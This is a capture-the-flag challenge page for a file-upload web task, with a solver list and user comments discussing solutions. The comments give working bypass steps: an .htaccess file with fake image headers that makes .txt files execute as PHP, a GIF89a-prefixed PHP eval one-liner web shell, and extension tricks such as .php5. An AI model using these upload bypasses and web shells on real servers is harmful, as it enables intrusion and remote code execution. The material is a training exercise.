Upload 2WEB 未解决
分数:
0
金币:
0
题目作者:
未知
一 血:
Max_yiz
一血奖励:
0金币
解 决:
140
提 示:
描 述:
We used a blacklist now ... can you **access** the flag now?\n\n\n\
\ **Author**: souad
评分(2)
解题动态
![](/static/images/face.webp)
skyhigh 攻破了该题 8天前
![](/upload/user/20240718/a119638564e3ca270d1456696e777bf7.webp)
XmN<=GzR 攻破了该题 9天前
![](/static/images/face.webp)
Jupiter 攻破了该题 11天前
![](/upload/user/20210728/1e7045c5275531de07c865aa2c2140f2.gif)
fuhuameng 攻破了该题 12天前
![](/static/images/face.webp)
lcychange 攻破了该题 17天前
![](/static/images/face.webp)
wangjf 攻破了该题 24天前
![](/static/images/face.webp)
asesese 攻破了该题 25天前
![](/upload/user/20210710/fe7eac0f6fbdd215080b3ae1a03eb145.webp)
brucelsone 攻破了该题 25天前
![](/static/images/face.webp)
小白小白 攻破了该题 28天前
![](/static/images/face.webp)
luckylian 攻破了该题 1月前
![](/static/images/face.webp)
liang777 攻破了该题 1月前
![](/static/images/face.webp)
chouchou 攻破了该题 1月前
![](/static/images/face.webp)
WindJ0Y 攻破了该题 1月前
![](/static/images/face.webp)
M9M9 攻破了该题 1月前
![](/static/images/face.webp)
许愿芙芙 攻破了该题 1月前
![](/static/images/face.webp)
HWHHJ 攻破了该题 1月前
![](/static/images/face.webp)
blackenpig 攻破了该题 1月前
![](/static/images/face.webp)
xiuliyeer1 攻破了该题 2月前
![](/static/images/face.webp)
18993258097 攻破了该题 2月前
![](/upload/user/20230617/e7db656485631961350d16ca2977986b.webp)
评论
HWHHJ 1月前
举报
逆天题目,还是能做
miko88 1天前
举报
上传的.htaccess和txt不在同一目录,是怎么做的啊
toxi 4月前
举报
只需要把文件后缀的.php换成.php5即可
啊这这 4月前
举报
题目非常好 不过我有个疑问 为什么我上传的shell木马中的提交参数函数必须是REQUEST还要是大写 我尝试了GET POST都不行 大写是语法只能是大写还是其他原因吗
xiaoxiao972521 3月前
举报
可以吧,$_GET $_REQUEST 都行,这些属于php函数,就是这个写法
我不知丢答案 4月前
举报
为什么我上传.user.ini文件去连的时候连不上??
JJhello 7月前
举报
接下面,内容为一句话木马,然后蚁剑连shell.txt的路径即可
JJhello 7月前
举报
上传一个文件名为 ".htaccess",注意,文件名前面没有任何东西的,文件内容为: #define width 16 #define height 7 <FilesMatch \.txt$> SetHandler application/x-httpd-php </FilesMatch> 然后上传shell.txt,内容为
samRsa 8月前
举报
1、bp抓包上传.htaccess #define width 16 #define height 7 <FilesMatch \.txt$> SetHandler application/x-httpd-php </FilesMatch> 2、上传马 GIF89a <?php @eval($_POST['cmd']); ?>
PandaCattle 10月前
举报
看了官方wp就知道有多离谱。。https://github.com/Shellmates/HackINI-2k23-public/blob/main/web/upload-2/solve/README.md
hopeinhand 10月前
举报
后缀php不行,换后缀php5发现容器只允许.php后缀执行命令,使用.htaccess绕过
PandaCattle 10月前
举报
@jiangbw 做出来了,只能说逆天,.htaccess内容里面必须有#define width 16 #define height 7
PandaCattle 10月前
举报
@jiangbw 我也一样 直接报错了 是不是环境有问题
jiangbw 10月前
举报
@niano.0 .htaccess上传完就跳界面了,那怎么绕过啊
niano.0 10月前
举报
@xjc7580 大佬,怎么做的呀
xjc7580 10月前
举报
大佬,再给点提示呗,上传.htaccess与上传的shell不一个目录啊